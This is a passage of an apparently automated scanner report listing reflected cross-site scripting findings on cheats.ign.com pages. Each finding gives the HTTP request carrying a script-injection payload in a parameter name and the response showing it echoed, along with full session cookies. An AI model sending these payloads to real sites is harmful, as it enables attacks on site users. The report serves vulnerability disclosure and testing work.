Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/wii-cheats/index.html?57ac0"-alert(1)-"3c9c5074ccb=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/wii-cheats/index.html?57ac0"-alert(1)-"3c9c5074ccb=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.91. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/wii-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a851c"><script>alert(1)</script>1a568c9cf90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/wii-cheats/index.html?a851c"><script>alert(1)</script>1a568c9cf90=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/wii-cheats/index.html?a851c"><script>alert(1)</script>1a568c9cf90=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.92. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/xbox-360-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 342f5"><script>alert(1)</script>f6da6f90a8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/xbox-360-cheats/index.html?342f5"><script>alert(1)</script>f6da6f90a8e=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/xbox-360-cheats/index.html?342f5"><script>alert(1)</script>f6da6f90a8e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.93. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/xbox-360-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10a4"-alert(1)-"ad4092dec39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/xbox-360-cheats/index.html?b10a4"-alert(1)-"ad4092dec39=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... ard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/xbox-360-cheats/index.html?b10a4"-alert(1)-"ad4092dec39=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.94. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/001/001317.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29999"-alert(1)-"ace275002aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ob2/068/001/001317.html?29999"-alert(1)-"ace275002aa=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:19 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 110056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/ob2/068/001/001317.html?29999"-alert(1)-"ace275002aa=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.95. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/001/001317.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645d7"><script>alert(1)</script>76338fa888c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ob2/068/001/001317.html?645d7"><script>alert(1)</script>76338fa888c=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:15 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 110302
1.96. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/038/038020.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff85"><script>alert(1)</script>58343bed42e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ob2/068/038/038020.html?6ff85"><script>alert(1)</script>58343bed42e=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:12:59 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 104502
1.97. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/038/038020.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77763"-alert(1)-"34b88f4b639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ob2/068/038/038020.html?77763"-alert(1)-"34b88f4b639=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:02 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 104439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/ob2/068/038/038020.html?77763"-alert(1)-"34b88f4b639=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.98. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/077/077644.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5b6f"-alert(1)-"4d1ec130b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ob2/068/077/077644.html?c5b6f"-alert(1)-"4d1ec130b8e=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:09 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 106691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/ob2/068/077/077644.html?c5b6f"-alert(1)-"4d1ec130b8e=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.99. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/077/077644.html
Issue detail
